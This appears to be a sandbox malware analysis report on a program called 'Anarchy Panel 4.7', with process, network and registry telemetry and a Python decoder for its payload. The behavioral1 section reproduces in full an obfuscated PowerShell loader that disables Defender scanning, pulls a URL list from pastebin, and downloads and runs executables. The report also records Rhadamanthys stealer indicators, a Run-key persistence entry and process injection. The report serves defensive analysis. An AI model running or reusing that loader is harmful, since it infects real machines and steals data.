Platform

win7-20230712-en

Max time kernel

1560s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

828s

Max time network

1166s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1745s

Max time network

1159s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

Signatures

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 428 -p 2684 -ip 2684

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2684 -s 448

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

memory/2684-134-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

memory/2684-133-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp

memory/2684-135-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

memory/2684-136-0x00007FF9305C0000-0x00007FF930889000-memory.dmp

memory/2684-137-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp

memory/2684-138-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1568s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

829s

Max time network

1160s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1556s

Max time network

1560s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

786s

Max time network

1125s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1157s

Max time network

1163s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1145s

Max time network

1153s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1562s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1162s

Max time network

1168s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1644s

Max time network

1143s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1566s

Max time network

1569s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"
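The -EncodedCommand argument in the process list above is Base64 over UTF-16LE (PowerShell does not accept UTF-8 here), and the script inside is padded with throw-away block comments such as <#exw#> to defeat string matching on the clear text. The decoder below is an added example and not part of the sandbox report; the only input it uses is the Base64 blob copied verbatim from the powershell.exe command line above, and the helper names are my own.

```python
import base64
import re

# Copied verbatim from the behavioral1 powershell.exe command line above.
ENCODED_COMMAND = "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="

# PowerShell block comments (<# ... #>) that the loader sprinkles between tokens.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
URL = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument: Base64 wrapping UTF-16LE script text."""
    raw = base64.b64decode(blob)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even byte length")
    return raw.decode("utf-16-le")


def strip_block_comments(script: str) -> tuple[str, list[str]]:
    """Drop <# ... #> comments and collapse the whitespace they leave behind.

    Returns the cleaned script plus the removed comment bodies, so the analyst
    can see how much filler the obfuscator inserted.
    """
    removed = [m.group(0)[2:-2] for m in BLOCK_COMMENT.finditer(script)]
    cleaned = BLOCK_COMMENT.sub(" ", script)
    cleaned = re.sub(r"\s+", " ", cleaned).strip()
    return cleaned, removed


def extract_urls(script: str) -> list[str]:
    """Every http(s) URL in the script, in order of appearance."""
    return URL.findall(script)


def analyze(blob: str) -> dict:
    """One-shot triage of an -EncodedCommand blob."""
    script = decode_encoded_command(blob)
    cleaned, comments = strip_block_comments(script)
    return {
        "script": cleaned,
        "comments_removed": comments,
        "urls": extract_urls(cleaned),
        # Defender exclusion added before anything is downloaded.
        "defender_exclusion": "Add-MpPreference" in cleaned and "-ExclusionPath" in cleaned,
        # Download-to-disk followed by execution: the dropper pattern.
        "downloads_and_runs": "DownloadFile(" in cleaned and "Start-Process" in cleaned,
    }


if __name__ == "__main__":
    result = analyze(ENCODED_COMMAND)
    print(result["script"])
    print("comments removed:", result["comments_removed"])
    print("urls:", result["urls"])
```

Decoded, the script adds Defender path exclusions for $env:UserProfile and $env:SystemDrive, fetches a CRLF-separated list of URLs from the pastebin raw page, writes each download to $env:Temp as one [System.IO.Path]::GetRandomFileName() stem with an index and an .exe suffix, then starts every file in a second loop. That is exactly the aqcorpk2.zlc0.exe to aqcorpk2.zlc3.exe series and the bitbucket.org connections recorded elsewhere in this report.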

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp

Files

memory/1936-55-0x0000000074470000-0x0000000074A1B000-memory.dmp

memory/1936-56-0x0000000074470000-0x0000000074A1B000-memory.dmp

memory/1936-57-0x0000000002670000-0x00000000026B0000-memory.dmp

memory/1936-58-0x0000000002670000-0x00000000026B0000-memory.dmp

memory/1936-59-0x0000000074470000-0x0000000074A1B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1800s

Max time network

1149s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A (6 identical rows; the sandbox recorded no indicator, process or target for any of them)

Rhadamanthys

stealer rhadamanthys

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4860 set thread context of 4456 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe C:\Windows\System32\dialer.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows; the sandbox recorded no indicator, process or target for any of them)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
